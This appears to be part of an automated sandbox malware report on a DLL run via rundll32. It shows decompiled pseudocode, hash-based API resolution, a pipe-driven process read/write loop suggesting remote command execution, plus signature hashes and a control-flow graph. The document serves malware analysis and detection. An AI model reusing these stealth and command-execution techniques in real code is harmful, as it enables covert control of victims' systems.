                  				E0000000118000459C(0x677ec78c, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				_t45 = _t161 + 0x1b; // 0x1f
                  				r12d = _t45;
                  				if (_t122 == _t123) goto 0x80002a40;
                  				 *_t122();
                  				goto 0x80002a42;
                  				if (0 == 0) goto 0x80002a80;
                  				asm("bts dword [esp+0x90], 0x8");
                  				E0000000118000459C(0xe7f09937, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t122 == _t123) goto 0x80002a80;
                  				r9d = 4;
                  				 *_t122();
                  				goto 0x80002a80;
                  				return GetLastError();
                  			}
























                  0x1800027d4
                  0x1800027d4
                  0x1800027d9
                  0x1800027e9
                  0x1800027ed
                  0x1800027f4
                  0x180002805
                  0x18000280d
                  0x180002810
                  0x18000281d
                  0x180002823
                  0x180002827
                  0x180002827
                  0x18000282b
                  0x18000282d
                  0x180002833
                  0x180002835
                  0x18000283c
                  0x18000283e
                  0x18000284f
                  0x180002857
                  0x180002860
                  0x180002863
                  0x180002869
                  0x18000286d
                  0x18000286f
                  0x180002871
                  0x18000287c
                  0x180002880
                  0x18000288a
                  0x180002897
                  0x1800028a2
                  0x1800028aa
                  0x1800028b0
                  0x1800028b8
                  0x1800028c0
                  0x1800028c2
                  0x1800028c8
                  0x1800028d4
                  0x1800028df
                  0x1800028e5
                  0x1800028f7
                  0x180002902
                  0x18000290a
                  0x180002912
                  0x18000291d
                  0x180002925
                  0x180002927
                  0x180002930
                  0x180002936
                  0x180002938
                  0x180002947
                  0x18000294f
                  0x180002955
                  0x180002958
                  0x18000295f
                  0x180002961
                  0x180002963
                  0x18000296e
                  0x180002972
                  0x18000297c
                  0x180002988
                  0x18000298d
                  0x180002993
                  0x1800029a2
                  0x1800029aa
                  0x1800029c9
                  0x1800029d4
                  0x1800029d7
                  0x1800029df
                  0x1800029e4
                  0x1800029e9
                  0x1800029eb
                  0x1800029ed
                  0x1800029f8
                  0x1800029fc
                  0x180002a06
                  0x180002a12
                  0x180002a1a
                  0x180002a1f
                  0x180002a1f
                  0x180002a26
                  0x180002a3c
                  0x180002a3e
                  0x180002a44
                  0x180002a46
                  0x180002a58
                  0x180002a60
                  0x180002a6e
                  0x180002a74
                  0x180002a76
                  0x180002a99

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocErrorLastlstrlenmemset
                  • String ID: P
                  • API String ID: 1242601240-3110715001
                  • Opcode ID: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction ID: b9b39858d45b2fed8cd52d627653eb03beea5c07a2efbf285fd96505e9c46d20
                  • Opcode Fuzzy Hash: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction Fuzzy Hash: E2718B7230468897EBA2DF62A8443DA73A0F78DBC4F488425AF4E47B46CF38D658C710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 471 180008368-1800083a8 CreateEventA 472 180008598-18000859e GetLastError 471->472 473 1800083ae-1800083cc call 18000459c 471->473 475 1800085a0-1800085a8 472->475 479 1800083ce-1800083de 473->479 480 1800083e0 473->480 477 1800085aa CloseHandle 475->477 478 1800085b0-1800085b9 475->478 477->478 481 1800083e2-1800083e4 479->481 480->481 481->472 483 1800083ea-1800083ee ResumeThread 481->483 484 1800083f4-180008405 GetExitCodeProcess 483->484 484->472 485 18000840b-180008415 484->485 486 180008593-180008596 485->486 487 18000841b-18000843f PeekNamedPipe 485->487 486->472 486->475 487->472 488 180008445-18000844a 487->488 489 18000844c-18000846d ReadFile 488->489 490 18000848d-18000849e call 18000459c 488->490 489->472 492 180008473-180008487 call 180004258 489->492 495 1800084b3 490->495 496 1800084a0-1800084b1 490->496 492->472 492->490 498 1800084b5-1800084b7 495->498 496->498 498->472 500 1800084bd-1800084c4 498->500 501 1800084c6-1800084e4 WriteFile 500->501 502 1800084ee-18000850a WaitForMultipleObjects 500->502 501->472 503 1800084ea 501->503 502->475 504 180008510-180008513 502->504 503->502 505 180008519-18000852a call 18000459c 504->505 506 1800085ba-1800085bf 504->506 510 180008544 505->510 511 18000852c-180008542 505->511 506->486 507 1800085c1 506->507 507->484 512 180008546-18000854c 510->512 511->512 514 180008581 512->514 515 18000854e-18000856f WriteFile 512->515 518 180008583-180008585 514->518 519 1800085c6-1800085cb 514->519 516 180008571-18000857c ResetEvent 515->516 517 18000858b-180008591 GetLastError 515->517 516->484 517->486 518->484 518->517 519->475
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorFileLast$EventWrite$CloseCodeCreateExitHandleMultipleNamedObjectsPeekPipeProcessReadResetResumeThreadWait
                  • String ID: .RK
                  • API String ID: 1606758550-3354657194
                  • Opcode ID: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction ID: c67b93fc325dec5a333161014b43f1cf91cc3d00d80d1a92eadb22293fcdf481
                  • Opcode Fuzzy Hash: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction Fuzzy Hash: 6C614032314A49D2EB92CB25E9947DA73E0FB8C7C5F408121FB8987A94DF38D658DB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$Alloc$CriticalSectionlstrlen$EnterEscapeLeavelstrcpymemcpy
                  • String ID:
                  • API String ID: 1109037607-0
                  • Opcode ID: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction ID: acf6d717728defc35103db72fb922d6f00203a7e454cd640fbdac6a35d594990
                  • Opcode Fuzzy Hash: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction Fuzzy Hash: F0519A35304B8986EB96CB67A8447DA73A5FB8DFC4F44C025EE4A83754EE39C609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseHandle$CriticalSection$Sleep$DeleteEnterEventFreeHeapLeaveObjectSingleWait
                  • String ID:
                  • API String ID: 2177250193-0
                  • Opcode ID: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction ID: f3fed24fe94b1aa8e153d29e7a34276cc5438fe7d956490b47d4b11a712edef8
                  • Opcode Fuzzy Hash: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction Fuzzy Hash: EA31F536701A4986EB96DF62E8503AD3360FB98FD4F44C021EA5E936A5DF38CA4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                  • String ID: H
                  • API String ID: 948315288-2852464175
                  • Opcode ID: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction ID: 40cf2675a00ff9b37053f4863b037564f167e8a7fa8b642abd638291e1f5e275
                  • Opcode Fuzzy Hash: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction Fuzzy Hash: 7F914C32209B4996EBA6CF15E4447A9B3A1F74DBC4F09C129EA8D47754EF3CDA4AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E0000000118000431C(void* __edx, signed long long __rax, long long __rbx, intOrPtr* __rcx, long long __rbp, signed short _a8, intOrPtr _a16, long long _a24, long long _a32) {
                  				void* _v40;
                  				void* _v56;
                  				void* _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				long _t75;
                  				signed long long _t121;
                  				signed long long _t122;
                  				intOrPtr* _t124;
                  				void* _t151;
                  				void* _t158;
                  				void* _t172;
                  
                  				_t162 = __rbp;
                  				_t121 = __rax;
                  				_a24 = __rbx;
                  				_a32 = __rbp;
                  				_t161 =  *0x8000d4a0;
                  				_t124 = __rcx;
                  				r14d = 0;
                  				WaitForSingleObject(??, ??);
                  				if ( *((intOrPtr*)(__rcx + 0x50)) == r14d) goto 0x8000449d;
                  				E0000000118000459C(0xb74c62f4, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x80004372;
                  				 *_t121();
                  				_t151 = __rcx + 0x4c;
                  				r8d = 0x10;
                  				memcpy(??, ??, ??);
                  				E0000000118000459C(0x176fdd38, _t121,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x800043a9;
                  				_t10 = _t151 + 1; // 0x2
                  				_t11 = _t151 + 5; // 0x6
                  				r8d = _t11;
                  				 *_t121();
                  				goto 0x800043ad;
                  				_t122 = _t121 | 0xffffffff;
                  				 *(__rcx + 0x10) = _t122;
                  				if (_t122 == 0xffffffff) goto 0x8000444d;
                  				E0000000118000459C(0x66454c9c, _t122,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t122 == _t172) goto 0x800043e0;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800043e3;
                  				if (r14d != r14d) goto 0x80004435;
                  				r8d = 1;
                  				_a8 = r14w;
                  				if (E00000001180008150(_t10, 0x66454c9c, __rcx,  *(__rcx + 0x10),  *__rcx, _t158,  *0x8000d4a0, __rbp,  &_a8) != r14d) goto 0x80004442;
                  				SetEvent(??);
                  				r9d = _a8 & 0x0000ffff;
                  				if (E000000011800091F8(_t10, _t124, _t124,  *((intOrPtr*)(_t124 + 0x10)), _t161, _t162,  &_a8) != r14d) goto 0x80004442;
                  				goto 0x8000447e;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				E00000001180008308(_t122, _t124, _t124 + 0x10);
                  				goto 0x80004455;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				if (r14d + 1 !=  *((intOrPtr*)(_t124 + 0x44))) goto 0x80004481;
                  				ResetEvent(??);
                  				WaitForSingleObject(??, ??);
                  				if (WaitForSingleObject(??, ??) == 0x102) goto 0x80004386;
                  				goto 0x80004570;
                  				E0000000118000459C(0x544646d0, _t122,  *((intOrPtr*)(_t124 + 0x20)));
                  				if (_t122 == _t172) goto 0x800044be;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800044c1;
                  				if (r14d != r14d) goto 0x80004568;
                  				_a16 = 0x10;
                  				E0000000118000459C(0xd0aed27e, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x800044f2;
                  				 *_t122();
                  				goto 0x800044f5;
                  				if (r14d != r14d) goto 0x80004568;
                  				SetEvent(??);
                  				E0000000118000459C(0xa1aa58b7, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x8000452c;
                  				 *_t122();
                  				goto 0x80004530;
                  				if ((_t122 | 0xffffffff) == 0xffffffff) goto 0x80004568;
                  				r9d = 0;
                  				if (E000000011800091F8(_t10, _t124, _t124, _t122 | 0xffffffff, _t161, _t162,  &_a8) == r14d) goto 0x80004504;
                  				E0000000118000459C(0xb74c62f4, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x80004504;
                  				 *_t122();
                  				goto 0x80004504;
                  				_t75 = GetLastError();
                  				ReleaseMutex(??);
                  				asm("lock add dword [esi+0x38], 0xffffffff");
                  				return _t75;
                  			}















                  0x18000431c
                  0x18000431c
                  0x18000431c
                  0x180004321
                  0x180004332
                  0x180004339
                  0x180004340
                  0x180004349
                  0x180004357
                  0x180004362
                  0x18000436a
                  0x180004370
                  0x180004372
                  0x18000437b
                  0x180004381
                  0x18000438f
                  0x180004397
                  0x18000439e
                  0x1800043a1
                  0x1800043a1
                  0x1800043a5
                  0x1800043a7
                  0x1800043a9
                  0x1800043ad
                  0x1800043b5
                  0x1800043c4
                  0x1800043cc
                  0x1800043d6
                  0x1800043dc
                  0x1800043de
                  0x1800043e6
                  0x1800043f4
                  0x1800043fa
                  0x18000440a
                  0x180004410
                  0x180004416
                  0x180004431
                  0x180004433
                  0x180004440
                  0x180004446
                  0x18000444b
                  0x180004458
                  0x18000445f
                  0x180004465
                  0x180004478
                  0x180004492
                  0x180004498
                  0x1800044a2
                  0x1800044aa
                  0x1800044b4
                  0x1800044ba
                  0x1800044bc
                  0x1800044c4
                  0x1800044d3
                  0x1800044db
                  0x1800044e3
                  0x1800044ee
                  0x1800044f0
                  0x1800044f8
                  0x1800044fe
                  0x18000450d
                  0x180004515
                  0x180004525
                  0x18000452a
                  0x180004534
                  0x18000453b
                  0x18000454c
                  0x180004557
                  0x18000455f
                  0x180004564
                  0x180004566
                  0x180004568
                  0x180004574
                  0x18000457a
                  0x180004599

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorEventLastObjectSingleWait$MutexReleaseResetmemcpy
                  • String ID:
                  • API String ID: 1434584367-0
                  • Opcode ID: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction ID: da870e4c5b3f8ba762a5b16c43bcb008f7342bdb94fea84615746d30c68c72b5
                  • Opcode Fuzzy Hash: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction Fuzzy Hash: 817173B2210A0882EBA2DF65D4503ED3361F78CBE4F148612EE6A5B7D5CE34CA898705
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: _snprintf$Heap$AllocTimememcpy$FileFreeSystemlstrlen
                  • String ID:
                  • API String ID: 1448584724-0
                  • Opcode ID: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction ID: 43bd3c41a0e216f1fe2d256970a36843f92bdaad392a56b89b43ab90d53a1bd0
                  • Opcode Fuzzy Hash: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction Fuzzy Hash: 5851AB36B14A4886EB92CF16E8047DA77A5F78CBC4F558121EE0D83755EF38DA1AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseHandleHeapProcess$AllocCreateErrorFreeLastMultipleObjectsTerminateWaitmemset
                  • String ID: h
                  • API String ID: 3316326719-2439710439
                  • Opcode ID: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction ID: 097b2738b8004f5ee40f8b7a1758c839ecbf0a38091e65ea8e5fbb9dadc2f9be
                  • Opcode Fuzzy Hash: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction Fuzzy Hash: CF318E32704B8986EB95CB56E84479AB3A1F78CBD0F14C135EA9D83B64DF78C548CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E0000000118000970C(void* __ebx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed long long __r11) {
                  				void* __rdi;
                  				signed int _t56;
                  				int _t61;
                  				intOrPtr _t77;
                  				intOrPtr _t78;
                  				struct _CRITICAL_SECTION* _t121;
                  				long long _t124;
                  				intOrPtr* _t150;
                  				struct _CRITICAL_SECTION* _t154;
                  				long long _t161;
                  				intOrPtr* _t162;
                  				void* _t165;
                  				void* _t166;
                  				void* _t168;
                  				signed long long _t177;
                  				struct _CRITICAL_SECTION* _t179;
                  				struct _CRITICAL_SECTION* _t183;
                  				void* _t186;
                  				void* _t189;
                  				void* _t190;
                  
                  				_t177 = __r11;
                  				_t168 = __r8;
                  				_t126 = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rbx;
                  				 *((long long*)(_t165 + 0x18)) = _t161;
                  				 *((long long*)(_t165 + 0x20)) = __rsi;
                  				_t166 = _t165 - 0x60;
                  				_t159 =  *__rcx;
                  				r14d = r8d;
                  				_t190 = __rdx;
                  				_t162 = __rcx;
                  				 *((long long*)(_t166 + 0x58)) =  *__rcx;
                  				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x80009758;
                  				E000000011800045E8(__ebx,  *0x8000d4a0, __rbx, __rcx,  *__rcx, __rcx, _t189, _t186);
                  				EnterCriticalSection(_t183);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(_t179);
                  				r11d =  *(_t162 + 0x70) & 0x000000ff;
                  				_t56 =  *(_t162 + 0x50) & 0x000000ff;
                  				if (r11d - _t56 >= 0) goto 0x800097e8;
                  				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x48)) + _t177 * 8));
                  				_t77 =  *_t150;
                  				if (_t77 == dil) goto 0x800097aa;
                  				if (_t77 == 0x2f) goto 0x800097a5;
                  				_t78 =  *((intOrPtr*)(_t150 + 1));
                  				if (_t78 != dil) goto 0x80009796;
                  				if (_t78 != dil) goto 0x800097ad;
                  				_t121 = _t154;
                  				if (_t121 == _t154) goto 0x800097c5;
                  				if ( *((char*)(_t121 - 1)) != 0x3a) goto 0x800097c5;
                  				if ( *((char*)(_t121 + 1)) != 0x2f) goto 0x800097c5;
                  				E00000001180001C00(0, _t126, _t177 + _t150, _t154, _t159, _t162);
                  				if (_t121 == _t154) goto 0x800097e8;
                  				 *(_t166 + 0x90) = 0 | _t56 + 0x00000002 == 0x00000008;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				if (_t121 == _t154) goto 0x8000996c;
                  				r9d = 0;
                  				r8d = r14d;
                  				 *((long long*)(_t166 + 0x38)) = _t166 + 0x40;
                  				 *((long long*)(_t166 + 0x30)) = _t166 + 0x48;
                  				_t24 = _t166 + 0x50; // 0x32
                  				_t124 = _t24;
                  				 *((long long*)(_t166 + 0x28)) = _t124;
                  				 *((intOrPtr*)(_t166 + 0x20)) = 0;
                  				if (E00000001180006108(_t126, _t162, _t190, _t168) != 0) goto 0x8000995c;
                  				_t187 =  *_t162;
                  				EnterCriticalSection(_t154);
                  				asm("lock inc ecx");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t162 + 0x18)) == _t154) goto 0x8000986b;
                  				E00000001180001C00(0, _t126,  *((intOrPtr*)(_t162 + 0x18)), _t154, _t159, _t162);
                  				goto 0x80009873;
                  				asm("lock inc ecx");
                  				if ( *(_t166 + 0x90) == _t154) goto 0x8000993c;
                  				r14d = lstrlenA(??);
                  				_t61 = lstrlenA(??);
                  				_t32 = _t187 + 2; // 0x2
                  				r15d = _t61;
                  				E00000001180001C00(_t124 + _t32,  *(_t166 + 0x90), _t121, _t154, _t159, _t162);
                  				if (_t124 == _t154) goto 0x8000992e;
                  				_t33 = _t190 + 1; // 0x1
                  				r8d = _t33;
                  				 *((char*)( *_t162 + _t124)) = 0x2f;
                  				memcpy(??, ??, ??);
                  				dil =  *(_t166 + 0x90) != 0;
                  				 *((intOrPtr*)(_t166 + 0x38)) = 2;
                  				 *((long long*)(_t166 + 0x30)) =  *((intOrPtr*)(_t166 + 0xb8));
                  				 *((long long*)(_t166 + 0x28)) =  *((intOrPtr*)(_t166 + 0xb0));
                  				 *((intOrPtr*)(_t166 + 0x20)) =  *((intOrPtr*)(_t166 + 0x40));
                  				if (E000000011800088B4(_t56 + 2,  *(_t166 + 0x90),  *((intOrPtr*)(_t166 + 0x58)), _t124,  *((intOrPtr*)(_t166 + 0xb0)), _t159, _t124,  *((intOrPtr*)(_t166 + 0x50)),  *((intOrPtr*)(_t166 + 0x48))) != 0x10d2) goto 0x80009920;
                  				asm("sbb eax, eax");
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009971;
                  				return 8;
                  			}























                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x180009711
                  0x180009716
                  0x180009724
                  0x18000972f
                  0x18000973b
                  0x18000973e
                  0x180009741
                  0x180009744
                  0x18000974f
                  0x180009753
                  0x18000975c
                  0x180009762
                  0x18000976b
                  0x180009771
                  0x180009776
                  0x18000977d
                  0x180009788
                  0x18000978f
                  0x180009794
                  0x180009799
                  0x18000979e
                  0x1800097a3
                  0x1800097a8
                  0x1800097aa
                  0x1800097b0
                  0x1800097b6
                  0x1800097bc
                  0x1800097cc
                  0x1800097d7
                  0x1800097e1
                  0x1800097e8
                  0x1800097f0
                  0x1800097fb
                  0x1800097fe
                  0x180009801
                  0x18000980e
                  0x180009813
                  0x180009813
                  0x18000981b
                  0x180009820
                  0x18000982d
                  0x180009833
                  0x180009840
                  0x180009846
                  0x180009850
                  0x18000985d
                  0x180009861
                  0x180009869
                  0x180009873
                  0x18000987c
                  0x18000988e
                  0x180009891
                  0x18000989a
                  0x18000989f
                  0x1800098a2
                  0x1800098ad
                  0x1800098af
                  0x1800098af
                  0x1800098bb
                  0x1800098c0
                  0x1800098e3
                  0x1800098ed
                  0x1800098f9
                  0x180009902
                  0x180009907
                  0x180009917
                  0x18000991c
                  0x180009928
                  0x180009936
                  0x180009946
                  0x180009956
                  0x180009964
                  0x18000996a
                  0x180009990

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalFreeHeapSection$Leave$EnterTimelstrlen$FileSystemmemcpymemset
                  • String ID:
                  • API String ID: 4119546182-0
                  • Opcode ID: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction ID: 44ed652dd4a090d7685ee9479cd2374acead57c43adb5283d017da8f701a6da5
                  • Opcode Fuzzy Hash: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction Fuzzy Hash: F5719436608A8886EBA1CF66E8043DAB7A1F78CBD0F458125FE9D83755DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocCreateErrorHeapLastPipememset
                  • String ID: .RK
                  • API String ID: 2695650488-3354657194
                  • Opcode ID: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction ID: 378f6602c2b1250aa9488984ecc26cdba5ebabec116acb0dc11713ee51ebb5a5
                  • Opcode Fuzzy Hash: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction Fuzzy Hash: 4E41AD71314B8982EB93CB66E4613E977A4FB8CBC4F048021EA4987B95DF38D64CCB01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeaveSystemTime_snprintflstrlen
                  • String ID:
                  • API String ID: 2518601019-0
                  • Opcode ID: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction ID: d9d6c815191b5ef41651c0c787a8a8ca67448b671f5da5a3966f0d0395a17d9c
                  • Opcode Fuzzy Hash: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction Fuzzy Hash: C9313B36208B8486D795CF12F8447AAB761F789BD5F448026EE8A43B24EF3CD549CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
